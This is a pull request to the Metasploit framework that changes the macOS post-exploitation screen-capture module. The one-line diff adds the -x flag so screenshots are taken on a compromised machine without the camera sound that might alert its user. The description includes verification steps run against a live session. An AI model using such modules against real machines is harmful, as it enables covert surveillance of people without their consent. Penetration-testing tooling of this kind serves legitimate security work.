### PR TITLE
Make OSX screencapture silent

### DIFF
--- a/modules/post/osx/capture/screen.rb
+++ b/modules/post/osx/capture/screen.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Post
         cmd_exec("mkdir -p #{tmp_path}")
         filename = Rex::Text.rand_text_alpha(7)
         file = "#{tmp_path}/#{filename}"
-        cmd_exec("#{exe_path} -C -t #{file_type} #{file}")
+        cmd_exec("#{exe_path} -x -C -t #{file_type} #{file}")
         data = read_file(file)
         file_rm(file)
       rescue ::Rex::Post::Meterpreter::RequestError => e


### PR DESCRIPTION
The `post/osx/capture/screen` module was updated so that it no longer produces the camera sound effect when run.
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use post/osx/capture/screen`
- [x] Select a session
- [x] Ensure that the volume on the compromised machine is turned up
- [x] `run`
- [x] **Verify** no camera sound effect is played on the OS X machine

By default, the `screencapture` command on OS X plays a camera sound effect. The -x option silences this.
